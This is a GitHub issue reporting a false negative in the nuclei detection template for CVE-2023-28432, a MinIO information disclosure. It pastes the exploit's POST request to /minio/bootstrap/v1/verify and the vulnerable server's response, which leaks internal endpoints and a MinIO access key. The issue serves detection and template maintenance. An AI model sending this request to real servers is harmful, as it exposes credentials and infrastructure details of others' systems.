CVE-2023-28432 icon indicating copy to clipboard operation
CVE-2023-28432 copied to clipboard

Published 20 hours ago verified publisher icon Mr-xn

[False-Negative] CVE-2023-28432.yaml

Open s0k opened this issue 1 year ago • 0 comments

Nuclei Version:

[INF] Current nuclei version: v2.9.7 (latest)

Template file:

http/cves/2023/CVE-2023-28432.yaml

Command to reproduce:

➜  nuclei ./nuclei -u http://120.x.x.x/ -t http/cves/2023/CVE-2023-28432.yaml -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v2.9.7

		projectdiscovery.io

[INF] Current nuclei version: v2.9.7 (latest)
[INF] Current nuclei-templates version: v9.5.3 (latest)
[INF] New templates added in latest release: 82
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
[INF] [CVE-2023-28432] Dumped HTTP request for http://120.x.x.x/minio/bootstrap/v1/verify

POST /minio/bootstrap/v1/verify HTTP/1.1
Host: 120.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Connection: close
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

[DBG] [CVE-2023-28432] Dumped HTTP response http://120.x.x.x/minio/bootstrap/v1/verify

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Security-Policy: block-all-mixed-content
Content-Type: text/plain; charset=utf-8
Date: Wed, 28 Jun 2023 03:11:54 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains
Vary: Origin
X-Amz-Request-Id: 176CB409E02D9F1C
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block

{"MinioPlatform":"OS: linux | Arch: amd64","MinioEndpoints":[{"SetCount":1,"DrivesPerSet":4,"Endpoints":[{"Scheme":"http","Opaque":"","User":null,"Host":"172.16.1.52:9000","Path":"/data1","RawPath":"","ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":true},{"Scheme":"http","Opaque":"","User":null,"Host":"172.16.1.52:9000","Path":"/data2","RawPath":"","ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":true},{"Scheme":"http","Opaque":"","User":null,"Host":"172.16.1.53:9000","Path":"/data1","RawPath":"","ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":false},{"Scheme":"http","Opaque":"","User":null,"Host":"172.16.1.53:9000","Path":"/data2","RawPath":"","ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":false}]}],"MinioEnv":{"MINIO_ACCESS_KEY":"minioadmin","MINIO_SECRET_KEY":"xxxxxxx"}}
[INF] No results found. Better luck next time!

s0k avatar Jun 28 '23 03:06 s0k